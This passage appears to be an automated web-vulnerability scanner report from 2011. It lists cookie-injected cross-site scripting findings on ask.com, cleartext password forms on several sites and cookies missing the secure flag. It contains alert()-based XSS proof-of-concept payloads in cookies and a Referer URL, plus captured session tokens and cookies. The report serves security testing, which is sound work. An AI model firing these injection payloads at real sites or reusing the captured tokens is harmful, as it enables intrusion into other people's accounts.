Cookie: tbe=1; accepting=1; user=o=0&l=dir; wz_uid=74fd0"><script>alert(1)</script>82d6116414b; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; clc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; qh=1-cmVndWxhdG9yK2JvYXQ.; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5488|0~5489|0~5490|1; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.2.10.1296155592; wz_sid=014DDB4118C033B329ACD8C41BD460F3; cu.wz=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjE1LVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:34:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:34:59 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:34:59 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjM0OjU5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:34:59 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:34:59 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 141000

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=74fd0"><script>alert(1)</script>82d6116414b;u4=;u3=;u2=0;ord=-522541511?" width="1" height="1" frameborder="0">
...[SNIP]...

3.578. http://www.ask.com/web [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 177ad'-alert(1)-'86772840b71 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /web?qsrc=2990&o=0&l=dir&q=regulator+boat+north+carolina HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=regulator+boat&search=&qsrc=0&o=0&l=dir
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3177ad'-alert(1)-'86772840b71; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; clc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; qh=1-cmVndWxhdG9yK2JvYXQ.; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5488|0~5489|0~5490|1; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.2.10.1296155592; wz_sid=014DDB4118C033B329ACD8C41BD460F3; cu.wz=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjE1LVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:35:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:35:00 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:35:00 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjM1OjAwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:35:00 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:35:00 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 140604

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3177ad'-alert(1)-'86772840b71;u4=;u3=;u2=0;ord=-1153809332?" width="1" height="1" frameborder="0">
...[SNIP]...

4. Cleartext submission of password previous next
There are 11 instances of this issue:

http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://www.ask.com/ja-ask-dialog
http://www.ask.com/jsignin
http://www.ask.com/settings
http://www.dynamicdrive.com/forums/showthread.php
http://www.reel-time.com/forum/showthread.php

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

4.1. http://malsup.com/jquery/form/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field:

password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:42:24 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm3" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

4.2. http://malsup.com/jquery/form/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://malsup.com/jquery/form/dummy2.php

The form contains the following password field:

Password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.3. http://malsup.com/jquery/form/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field:

Password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.4. http://malsup.com/jquery/form/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field:

Password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.5. http://malsup.com/jquery/form/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field:

password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:42:24 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm1" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

4.6. http://malsup.com/jquery/form/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field:

password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:42:24 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm2" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

4.7. http://www.ask.com/ja-ask-dialog previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ask.com
Path:	/ja-ask-dialog

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ask.com/ja-check-user

The form contains the following password fields:

password
password2

Request

GET /ja-ask-dialog?src=serp&thinHeader=true&fullFlex=false HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=regulator+boat&search=&qsrc=0&o=0&l=dir
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; clc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; qh=1-cmVndWxhdG9yK2JvYXQ.; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjExLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5488|0~5489|0~5490|1; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.2.10.1296155592; wz_sid=014DDB4118C033B329ACD8C41BD460F3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:15 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjE1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:15 GMT; Path=/
Content-Length: 59658

...[SNIP]...
</div>

<form name="signupform" id="signupform" style="display:block" action="http://www.ask.com/ja-check-user" method="POST">
<fieldset>
...[SNIP]...
<div class="signup_col2">
                           <input style="width:262px;margin-right:10px" type="password" onchange="JASK.ja.ask_dialog.validatePassword();" id="dialog_password" name="password" tabindex="0" class="txtin txt3 abstract">
                       </div>
...[SNIP]...
<div class="signup_col2">
                           <input style="width:262px;margin-right:10px" type="password" onchange="JASK.ja.ask_dialog.confirmPassword();" id="dialog_password2" name="password2" tabindex="0" class="txtin txt3 abstract">
                       </div>
...[SNIP]...

4.8. http://www.ask.com/jsignin previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ask.com
Path:	/jsignin

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ask.com/jsignin

The form contains the following password field:

password

Request

GET /jsignin HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34908

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<div>

<form name="loginform" id="loginform" method="POST">

<input type="hidden" name="engine_id" value="sign_in">
...[SNIP]...
</div>
<input tabindex="0" style="width:320px" type="password" id="login_password" name="password" class="txtin_lo">

</div>
...[SNIP]...

4.9. http://www.ask.com/settings previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ask.com
Path:	/settings

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ask.com/settings

The form contains the following password fields:

currentpassword
newpassword
password

Request

GET /settings HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:28 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:28 GMT; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:28 GMT; Path=/
Content-Length: 55327

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
</div>
<form name="myForm2" id="myForm2">
<div id="passsuccessmsg">
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="currentpassword" id="currentpassword" value=""></div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="newpassword" id="newpassword" value=""> </div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="password" id="password" value=""> </div>
...[SNIP]...

4.10. http://www.dynamicdrive.com/forums/showthread.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dynamicdrive.com
Path:	/forums/showthread.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.dynamicdrive.com/forums/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /forums/showthread.php?t=39177&highlight=smooth HTTP/1.1
Host: www.dynamicdrive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.11. http://www.reel-time.com/forum/showthread.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reel-time.com
Path:	/forum/showthread.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.reel-time.com/forum/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /forum/showthread.php HTTP/1.1
Host: www.reel-time.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:49:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9
X-Powered-By: PHP/4.4.9
Set-Cookie: bblastvisit=1296157791; expires=Fri, 27 Jan 2012 19:49:51 GMT; path=/; domain=.reel-time.com
Set-Cookie: bblastactivity=0; expires=Fri, 27 Jan 2012 19:49:51 GMT; path=/; domain=.reel-time.com
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 60891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/
...[SNIP]...

<form action="http://www.reel-time.com/forum/login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

5. SSL cookie without secure flag set previous next
There are 6 instances of this issue:

https://www.linkedin.com/secure/login
https://www.yachtworld.com/boat-loans/index.jsp
https://www.yachtworld.com/
https://www.yachtworld.com/boat-loans/consumer_loan_processing.html
https://www.yachtworld.com/boat-loans/forgot_password.jsp
https://www.yachtworld.com/boat-loans/myLoan.jsp

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

5.1. https://www.linkedin.com/secure/login previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

leo_auth_token="GST:U4lWXkjQ3w6HNUv-nUlaWUIo7h6V_Qw-aOlD2adTz-eYYAWJ39CBGM:1296157780:5c339d93dc107e9f4d21e938ffaf0bab11f63caf"; Version=1; Max-Age=1799; Expires=Thu, 27-Jan-2011 20:19:39 GMT; Path=/
s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
NSC_MC_QH_MFP=ffffffffaf19965645525d5f4f58455e445a4a421968;expires=Thu, 27-Jan-2011 20:19:49 GMT;path=/;httponly

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/login?session_full_logout=&trk=hb_signout&r= HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_MC_QH_MFP=ffffffffaf19965645525d5f4f58455e445a4a42198c; bcookie="v=1&d94e49db-3c23-4a26-a29f-2bc2d85c808d"; JSESSIONID="ajax:2350077440714366421"; leo_auth_token="GST:UJWUmX2WB6UBWvbQG9tU456hlj942-5NnJhAM36W6e3C5Y4NH21kQQ:1296155990:5ed64d4d5f57e19d1092d1eaf1f4a8bd26dd7b76"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c=";

Response

5.2. https://www.yachtworld.com/boat-loans/index.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.yachtworld.com
Path:	/boat-loans/index.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

boats_session_info=locale_currency_id:100; Domain=.boats.com; Expires=Fri, 27-Jan-2012 19:40:02 GMT; Path=/
boats_session_info=session_uom:126:locale_currency_id:100; Domain=.boats.com; Expires=Fri, 27-Jan-2012 19:40:02 GMT; Path=/
boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boat-loans/index.jsp HTTP/1.1
Host: www.yachtworld.com
Connection: keep-alive
Referer: http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp?slim=pp2797573100b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2bb13b8b4d3&cit=true&sm=3&is=&man=&fromLength=&toLength=&luom=126&fromYear=&toYear=&fromPrice=&toPrice=&currencyid=100&hmid=&ftid=&enid=&city=&spid=&rid=&cint=&msint=&ps=50
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; 